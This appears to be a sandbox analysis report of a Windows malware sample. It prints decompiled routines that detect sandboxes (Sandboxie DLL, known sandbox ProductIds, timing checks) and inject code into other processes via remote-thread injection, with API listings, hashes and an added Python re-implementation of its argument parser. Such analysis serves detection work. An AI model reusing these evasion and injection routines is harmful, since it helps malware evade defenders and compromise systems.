                                    				if( *_t8 == 1 && E00405334() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t9 =  *0x40d1f8; // 0x40e8e8
                                    				_t81 =  *_t9 - 1;
                                    				if( *_t9 == 1) {
                                    					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
                                    					if(_t49 == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				_t10 =  *0x40d1bc; // 0x40e8e9
                                    				if( *_t10 == 1 && E0040588C() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t11 =  *0x40d1b4; // 0x40e8ea
                                    				if( *_t11 == 1 && E004056C0() == 1) {
                                    					ExitProcess(0);
                                    				}
                                     				_t12 =  *0x40d200; // 0x40e8eb
                                     				if( *_t12 == 1) {
                                     					_t58 = GetTickCount(); // start of the timed block; elapsed time is compared against 0x1388 (5000 ms) below
                                     					// E00405750 is called once with the address of each check routine; its body is not shown in this listing
                                     					if(E00405750(L00405168) != 0) {
                                     						ExitProcess(0);
                                     					}
                                    					if(E00405750(E004051CC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004052EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405310) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405334) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004053EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004054A4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040555C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056DC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405770) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004057B4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040588C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056C0) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405124) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E004056DC(_t58) == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                     				_t13 =  *0x40d200; // 0x40e8eb
                                     				if( *_t13 != 1) {
                                     					L70:
                                     					return _t13;
                                     				} else {
                                     					E00405770();
                                     					_t15 = GetTickCount();
                                     					// 64-bit elapsed = GetTickCount() - _t58 (cdq/sbb pair); the constant-folded
                                     					// "if(0 != 0)" / "if(0 <= 0)" below is the decompiler's rendering of the high-dword test
                                     					_push(0);
                                     					asm("cdq");
                                     					 *_t64 =  *_t64 - _t58;
                                     					asm("sbb [esp+0x4], edx");
                                     					_t13 = _t15;
                                     					if(0 != 0) {
                                     						if(0 <= 0) {
                                     							goto L70;
                                     						}
                                     						L69:
                                     						ExitProcess(0);
                                     						return _t13;
                                     					}
                                     					if(_t13 <= 0x1388) { // more than 0x1388 = 5000 ms spent in the checks is treated as an instrumented environment: exit
                                     						goto L70;
                                     					}
                                     					goto L69;
                                     				}
                                     			}

                                     Instruction addresses for E0040B118 (the per-line address column of the interactive view): 0x0040b118 to 0x0040b3be.

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                    				intOrPtr _v20;
                                    				long _v24;
                                    				_Unknown_base(*)()* _v28;
                                    				_Unknown_base(*)()* _v32;
                                    				char _v36;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr _t15;
                                    				long _t17;
                                    				void* _t19;
                                    				void* _t23;
                                    				void* _t24;
                                    				void* _t31;
                                    				long _t32;
                                    				void* _t33;
                                    				DWORD* _t34;
                                    
                                    				_t25 = __ecx;
                                    				_t34 =  &_v24;
                                    				_t33 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t32 = 0;
                                    				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
                                    				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
                                    				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
                                    				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
                                    				_v20 = _t15;
                                    				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
                                    				_v24 = _t17;
                                    				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
                                    				_t24 = _t19;
                                    				if(_t24 != 0) {
                                    					WaitForSingleObject(_t24, 0xffffffff);
                                    					GetExitCodeThread(_t24, _t34);
                                    					_t32 =  *_t34;
                                    				}
                                    				return _t32;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
                                    				char _t5;
                                    				char _t6;
                                    				CHAR* _t7;
                                    				CHAR* _t8;
                                    				char _t9;
                                    				CHAR* _t11;
                                    				char _t14;
                                    				CHAR* _t15;
                                    				char _t17;
                                    				CHAR* _t19;
                                    				CHAR* _t22;
                                    				CHAR* _t23;
                                    				CHAR* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr* _t34;
                                    				void* _t35;
                                    				void* _t36;
                                    
                                    				_t34 = __edx;
                                    				_t22 = __eax;
                                    				while(1) {
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L4:
                                    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                    						_t36 = 0;
                                    						_t32 = _t22;
                                    						while(1) {
                                    							_t6 =  *_t22;
                                    							if(_t6 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t6 != 0x22) {
                                    								_t7 = CharNextA(_t22);
                                    								_t36 = _t36 + _t7 - _t22;
                                    								_t22 = _t7;
                                    								continue;
                                    							}
                                    							_t8 = CharNextA(_t22); // executed
                                    							_t22 = _t8;
                                    							while(1) {
                                    								_t9 =  *_t22;
                                    								if(_t9 == 0 || _t9 == 0x22) {
                                    									break;
                                    								}
                                    								_t11 = CharNextA(_t22);
                                    								_t36 = _t36 + _t11 - _t22;
                                    								_t22 = _t11;
                                    							}
                                    							if( *_t22 != 0) {
                                    								_t22 = CharNextA(_t22);
                                    							}
                                    						}
                                    						E00402074(_t34, _t36);
                                    						_t23 = _t32;
                                    						_t33 =  *_t34;
                                    						_t35 = 0;
                                    						while(1) {
                                    							_t14 =  *_t23;
                                    							if(_t14 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t14 != 0x22) {
                                    								_t15 = CharNextA(_t23);
                                    								if(_t15 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L27;
                                    								}
                                    								do {
                                    									L27:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t15 > _t23);
                                    								continue;
                                    							}
                                    							_t23 = CharNextA(_t23);
                                    							while(1) {
                                    								_t17 =  *_t23;
                                    								if(_t17 == 0 || _t17 == 0x22) {
                                    									break;
                                    								}
                                    								_t19 = CharNextA(_t23);
                                    								if(_t19 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L21;
                                    								}
                                    								do {
                                    									L21:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t19 > _t23);
                                    							}
                                    							if( *_t23 != 0) {
                                    								_t23 = CharNextA(_t23);
                                    							}
                                    						}
                                    						return _t23;
                                    					} else {
                                    						_t22 =  &(_t22[2]);
                                    						continue;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%
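The function E004012B8 above is a command-line tokenizer: it skips bytes at or below 0x20, drops a leading pair of quote characters, strips the quotes themselves and keeps spaces only while inside a quoted run. The following re-implementation is an added example and is not code from the report or from the sample; reading the routine as the Delphi RTL's GetParamStr is this example's inference, not a statement of the report, and CharNextA is replaced by single-character stepping, which is equivalent for the ASCII input used here.

```python
"""Re-implementation of the command-line tokenizer decompiled as E004012B8.

Added example, not code from the sandbox report or the analysed sample. The
loop structure follows the decompiled function: skip bytes <= 0x20, drop a
leading "" pair and retry, then copy characters until whitespace, removing
quote characters and keeping spaces only inside a quoted run.
"""


def next_param(cmdline, pos=0):
    """Return (token, position after it). An empty token means the line is exhausted."""
    n = len(cmdline)
    # Outer loop of the decompiled function: skip whitespace, then drop a
    # leading pair of quotes ("") and go round again.
    while True:
        while pos < n and ord(cmdline[pos]) <= 0x20:
            pos += 1
        if cmdline.startswith('""', pos):
            pos += 2
            continue
        break

    out = []
    # Inner loop: stop at the first byte <= 0x20 that is outside quotes.
    while pos < n and ord(cmdline[pos]) > 0x20:
        if cmdline[pos] != '"':
            out.append(cmdline[pos])
            pos += 1
            continue
        pos += 1                      # opening quote is not copied
        while pos < n and cmdline[pos] != '"':
            out.append(cmdline[pos])  # spaces are kept inside quotes
            pos += 1
        if pos < n:
            pos += 1                  # closing quote is not copied
    return "".join(out), pos


def split_params(cmdline):
    """All tokens of a command line, stopping at the first empty token."""
    tokens = []
    pos = 0
    while True:
        token, pos = next_param(cmdline, pos)
        if token == "":
            return tokens
        tokens.append(token)


if __name__ == "__main__":
    # Constructed input, not a command line observed in the report.
    print(split_params(r'"C:\Program Files\app.exe" --inst ""x"" a"b c"d'))
```

Two quirks worth knowing when reading a command line this binary was launched with: a quote that is never closed swallows the rest of the line, spaces included, and quotes may open and close several times inside one token (`a"b c"d` becomes `ab cd`).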

                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _t20;
                                    				void* _t22;
                                    				void* _t30;
                                    				intOrPtr _t37;
                                    				void* _t40;
                                    				void* _t43;
                                    
                                    				_t30 = __ecx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v8 = __edx;
                                    				_t40 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t43);
                                    				_push(0x4039f2);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t43 + 0xfffffff0;
                                    				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
                                    				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
                                    				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
                                    				_v16 = _t20;
                                    				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
                                    				if(_t22 != 0) {
                                    					CloseHandle(_t22);
                                    				}
                                    				_pop(_t37);
                                    				 *[fs:eax] = _t37;
                                    				_push(E004039F9);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004053EC() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-644-3177037-23510") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}
                                    0x004053f3
                                    0x00405404
                                    0x0040540b
                                    0x0040540d
                                    0x0040542d
                                    0x0040543b
                                    0x0040543d
                                    0x0040543d
                                    0x0040543b
                                    0x00405443
                                    0x00405451

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    • ProductId, xrefs: 00405423
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004054A4() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-337-8429955-22614") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272); // executed
                                    				return _t15;
                                    			}
                                    0x004054ab
                                    0x004054bc
                                    0x004054c3
                                    0x004054c5
                                    0x004054e5
                                    0x004054f3
                                    0x004054f5
                                    0x004054f5
                                    0x004054f3
                                    0x004054fb
                                    0x00405509

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    • ProductId, xrefs: 004054DB
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
